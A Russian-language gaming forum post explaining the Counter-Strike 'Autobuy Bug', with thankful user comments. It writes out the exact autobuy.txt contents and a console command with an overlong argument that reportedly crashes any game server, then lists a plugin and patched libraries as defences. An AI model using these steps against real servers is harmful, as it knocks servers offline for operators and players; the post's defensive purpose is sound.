Последние новости:
Популярные файлы:
Autobuy Bug. О нём. Методы защиты
Загружено стандартное изображение

Краши серверов сейчас, к сожалению, стали очень популярными. Злоумышленники узнают/разрабатывают все новые и новые баги/уязвимости серверов, порою в целях мести админу или просто раскручивая свой сервер (продвигая его в топах и расчищая ему дорогу).

Autobuy Bug - Это простой баг. 

[Действие бага]

1) В файле autobuy.txt (лежит в папке cstrike вашей CS) пропишите следующее:

m4a1
ak47
famas
galil
p90
mp5

primammo
secammoalias "primammo" "buyammo1;buyammo1;buyammo1;buyammo1;buyammo1;buyammo1;buyammo1"
alias "secoammo" "buyammo2;buyammo2;buyammo2;buyammo2;buyammo2;buyammo2;buyammo2"

alias "+awpsniper" "awp;usp;vesthelm;flash;flash;hegren;defuser"
alias "-awpsniper" "slot10;secoammo;primammo"
then
bind "f5" "+awpsniper"

defuser
vesthelm
vest

2) Зайдите на ЛЮБОЙ сервер, зайдите за команду и когда будете в игре напишите в консоли:

cl_setautobuy fuck 12345678901234567890123456789012

и всё - сервак падает.

Проще говоря уязвимость в том, что autobuy не должен быть больше 32 символов или равен этому. Иначе войдя в игру с изменённым файлом, игрок может вызвать DoS атаку и "положить" сервер. 


[Методы защиты]

1) Существует плагин, который закрывает полностью данную уязвимость. 

ссылка

2) Существуют пропатченные библиотека/сошка под ваш сервер WIN/LIN, которые просто нужно заменить на своем сервере (папка cstrike/dlls). Плагин не нужен.

скачать патч [1.5 mb]


- -2 +
поделиться
WaNTeD от 19.06.2011
14513
3
s-nesterov | 08.05.2012 | 08:47
3
+ (0) -
Спс.Большое
230190 | 26.10.2011 | 22:02
2
+ (0) -
Спасибо ! Надеюсь поможет !
Vip1k | 26.07.2011 | 12:32
1
+ (0) -
СВАСИБО!!!
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Сервера
el.MEJOR Team
Про сервачок
Про серв CS:S
Нужно знать
Наши опросы
Зачем тебе указательный палец?
Всего ответов: 1404
Партнеры